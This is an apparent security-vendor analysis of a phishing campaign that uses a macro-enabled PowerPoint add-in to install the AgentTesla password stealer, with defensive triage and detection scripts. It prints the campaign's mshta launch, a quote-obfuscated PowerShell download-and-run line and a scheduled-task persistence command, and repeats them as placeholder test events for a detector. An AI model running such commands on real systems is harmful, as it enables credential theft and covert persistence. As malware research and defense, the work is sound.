Malicious PowerPoint Documents on the Rise

Authored by Anuradha M

McAfee Labs have observed a new phishing campaign that makes use of the macro capabilities available in Microsoft PowerPoint. In this campaign, the spam email comes with a PowerPoint file as an attachment. Upon opening the malicious attachment, the VBA macro executes to deliver variants of AgentTesla, a well-known password stealer. These spam emails purport to be related to financial transactions.

AgentTesla is a RAT (Remote Access Trojan) that has been active since 2014. Attackers use this RAT as MaaS (Malware-as-a-Service) to steal user credentials and other information from victims via screenshots, keylogging, and clipboard captures. Its modus operandi is predominantly via phishing campaigns.

During Q2 2021, we have seen an increase in PowerPoint malware.

Figure 1. Trend of PPT malware over the first half of 2021

In this campaign, the spam email contains an attached file with a .ppam extension, which is a PowerPoint file containing VBA code. The lure used finance-related themes such as "New PO300093 Order", as shown in Figure 2. The attachment filename is "300093.pdf.ppam".

Figure 2. Spam Email

PPAM file: 

This file type was introduced in 2007 with the release of Microsoft Office 2007. It is a PowerPoint macro-enabled Open XML add-in file. It contains components that add extra functionality, including additional commands, custom macros, and new tools for extending default PowerPoint capabilities.

Since PowerPoint supports "add-ins" developed by third parties to add new features, attackers abuse this feature to automatically execute macros.

Technical Analysis:

Once the victim opens the ".ppam" file, a security notice pops up, as shown in Figure 3, to alert the user about the presence of macros.

Figure 3. Warning when opening the attached PowerPoint file

From Figure 4, you can see that the add-in feature of PowerPoint can be identified from the content of the [Content_Types].xml file that is present inside the ppam file.

Figure 4. Powerpoint add-in feature with macroEnabled

The PPAM file contains the following files and directories, which can be seen upon extraction.

  • _rels/.rels
  • [Content_Types].xml
  • ppt/_rels/presentation.xml.rels
  • ppt/asjdaaasdasdsdaasdsdasasdasddoasddasasddasasdsasdjasddasdoasjdasasddoajsdjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bin – Malicious file
  • ppt/presentation.xml
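To triage a PPAM offline in the way Figure 4 and the listing above describe, the following added script (not McAfee's code) opens the OPC zip, reads [Content_Types].xml, and flags the add-in content type and any VBA project part, including one stored under a random .bin name instead of vbaProject.bin. The sample package it builds is constructed, with a placeholder in place of a real VBA project.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC content types that mark a PowerPoint add-in main part and an embedded VBA project
ADDIN_MAIN = "application/vnd.ms-powerpoint.addin.macroEnabled.main+xml"
VBA_PROJECT = "application/vnd.ms-office.vbaProject"
CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"

def triage_ppam(data: bytes) -> dict:
    """Inspect a PPAM (an OPC zip) statically and report add-in / VBA indicators."""
    result = {"is_addin": False, "vba_parts": [], "renamed_vba": [], "entries": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        result["entries"] = z.namelist()
        root = ET.fromstring(z.read("[Content_Types].xml"))
        for ov in root.iter(CT_NS + "Override"):
            part, ctype = ov.get("PartName", ""), ov.get("ContentType", "")
            if ctype == ADDIN_MAIN:
                result["is_addin"] = True
            if ctype == VBA_PROJECT:
                result["vba_parts"].append(part)
                # this campaign stores the VBA project under a random .bin name, not vbaProject.bin
                if not part.lower().endswith("/vbaproject.bin"):
                    result["renamed_vba"].append(part)
    return result

def build_sample_ppam() -> bytes:
    """Constructed minimal package with the layout listed above; the .bin is a placeholder."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        f'<Override PartName="/ppt/presentation.xml" ContentType="{ADDIN_MAIN}"/>'
        f'<Override PartName="/ppt/asjdaaasd.bin" ContentType="{VBA_PROJECT}"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("ppt/_rels/presentation.xml.rels", "<Relationships/>")
        z.writestr("ppt/presentation.xml", "<presentation/>")
        z.writestr("ppt/asjdaaasd.bin", b"placeholder, not a real VBA project")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_ppam(build_sample_ppam()))
```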

Once the victim enables the macro, the add-in gets installed silently without the user's knowledge, which can be seen in Figure 5. On seeing that there is no content and no slide in the PowerPoint, the user will close the file, but in the background the macro code gets executed to initiate the malicious activity.

Figure 5. Installed Add-ins in the PowerPoint options

As you can see in Figure 6, the macro is executed inside the add-in's auto_open() event, i.e., the macro is fired immediately after the presentation is opened and the add-in is loaded.

Figure 6. VBA Code snippet with auto_open() event

On execution, the PowerPoint macro code launches a URL by invoking mshta.exe (Microsoft HTML Application), as shown in Figure 7. The mshta process is launched by PowerPoint by calling the CreateProcessA() API.

Below are the parameters passed to the CreateProcessA() API:

kernel32.CreateProcessA(00000000,mshta hxxps://,00000000,00000000,00000001,00000020,00000000,00000000,D, 

Figure 7. VBA Code snippet containing mshta and url

Below is the command line parameter of mshta:

mshta hxxps:// 

The URL hxxps:// redirects to "hxxps://p8hj[.]blogspot[.]com/p/27.html", but no response was received from "27.html" at the time of analysis.

Later, mshta.exe spawns powershell.exe as a child process.

Below are the command line parameters of PowerShell:

powershell.exe - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" i'E'x(iwr('hxxps://') -useB);i'E'x(iwr('hxxps://') -useB);i'E'x(iwr('hxxps://') -useB);

PowerShell downloads and executes script files from the above-mentioned URLs.

Figure 8 below shows the content of the first URL, "hxxps://":

Figure 8. Binary file content

There are two binary files stored in two huge arrays inside each downloaded PowerShell file. The first file is an EXE that acts as a loader and the second file is a DLL, which is a variant of AgentTesla. PowerShell fetches the AgentTesla payload from the URLs mentioned in the command line, decodes it, and launches MSBuild.exe to inject the payload into that process.

Scheduled Tasks:

To achieve persistence, it creates a scheduled task in "Task Scheduler" and drops a task file under C:\windows\system32\SECOTAKSA to keep the entire campaign working.

Figure 9. Code snippet to create a new scheduled task

The new task name is "SECOTAKSA". Its action is to execute the command "mshta hxxp:// //" and it is invoked every 80 minutes.

Below are the command line parameters of schtasks:

schtasks.exe - "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr """"MsHtA""""hxxp://""

Infection Chain:

Figure 10. Infection Chain

Process Tree:

Figure 11. Process Tree


McAfee's Endpoint Security (ENS) and Windows Systems Security (WSS) products have DAT coverage for this variant of malware.

This malicious PPAM document with SHA256 fb594d96d2eaeb8817086ae8dcc7cc5bd1367f2362fc2194aea8e0802024b182 is detected as "W97M/Downloader.dkw".

The PPAM document is also blocked by the AMSI feature in ENS as AMSI-FKN!

Additionally, the Exploit Prevention feature in McAfee's Endpoint Security product blocks the infection chain of this malware by adding the Expert Rule below, so as to protect our customers from this attack.

Expert Rule authored based on the following infection chain:

POWERPNT.EXE –> mshta.exe  

Expert Rule:

Rule {
  Process {
    Include OBJECT_NAME { -v "powerpnt.exe" }
  }
  Target {
    Match PROCESS {
      Include OBJECT_NAME { -v "mshta.exe" }
      Include PROCESS_CMD_LINE { -v "**http**" }
      Include -access "CREATE"
    }
  }
}
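The following added script (not McAfee's code) applies the same logic as the Expert Rule above to process-creation events, and extends it to the two later steps described in this post: mshta spawning a PowerShell downloader whose iex/iwr tokens are split with quotes, and schtasks creating the mshta persistence task. The events, hosts and URLs are constructed placeholders, not telemetry from the campaign.

```python
import re

# Constructed process-creation events (parent image, child image, command line) shaped like
# the process tree in this post; hosts and URLs are placeholders, not the campaign's.
EVENTS = [
    ("OUTLOOK.EXE", "POWERPNT.EXE", 'POWERPNT.EXE "300093.pdf.ppam"'),
    ("POWERPNT.EXE", "mshta.exe", "mshta https://example.invalid/p/27.html"),
    ("mshta.exe", "powershell.exe", "powershell.exe i'E'x(iwr('https://example.invalid/a') -useB)"),
    ("powershell.exe", "schtasks.exe",
     'schtasks.exe /create /sc MINUTE /mo 80 /tn "SECOTAKSA" /F /tr "MsHtA https://example.invalid/b"'),
    ("explorer.exe", "mshta.exe", 'mshta.exe "C:\\Program Files\\Vendor\\help.hta"'),
]

OFFICE_HOSTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def classify(parent, child, cmdline):
    """Return the detection labels that apply to one process-creation event."""
    p, c, cl = parent.lower(), child.lower(), cmdline.lower()
    # strip the quote characters used to split i'E'x / iwr so the tokens match again
    deobf = cl.replace("'", "").replace('"', "")
    hits = []
    # same logic as the Expert Rule: Office parent, mshta child, http(s) in the command line
    if p in OFFICE_HOSTS and c == "mshta.exe" and URL_RE.search(cl):
        hits.append("office_mshta_url")
    # second hop: mshta spawning PowerShell that downloads (iwr) and runs (iex) a script
    if p == "mshta.exe" and c == "powershell.exe" and "iwr(" in deobf and "iex(" in deobf:
        hits.append("mshta_powershell_download")
    # persistence: a new scheduled task whose action launches mshta with a URL
    if c == "schtasks.exe" and "/create" in cl and "mshta" in cl and URL_RE.search(cl):
        hits.append("schtasks_mshta_persistence")
    return hits

def scan_events(events):
    """Run classify over (parent, child, cmdline) tuples and keep only flagged events."""
    flagged = []
    for i, (parent, child, cmdline) in enumerate(events):
        labels = classify(parent, child, cmdline)
        if labels:
            flagged.append((i, child, labels))
    return flagged

if __name__ == "__main__":
    for idx, child, labels in scan_events(EVENTS):
        print(f"event {idx}: {child} -> {', '.join(labels)}")
```

The last event (a locally installed .hta launched from Explorer) is deliberately not flagged, which is the same false-positive boundary the Expert Rule's "**http**" match draws.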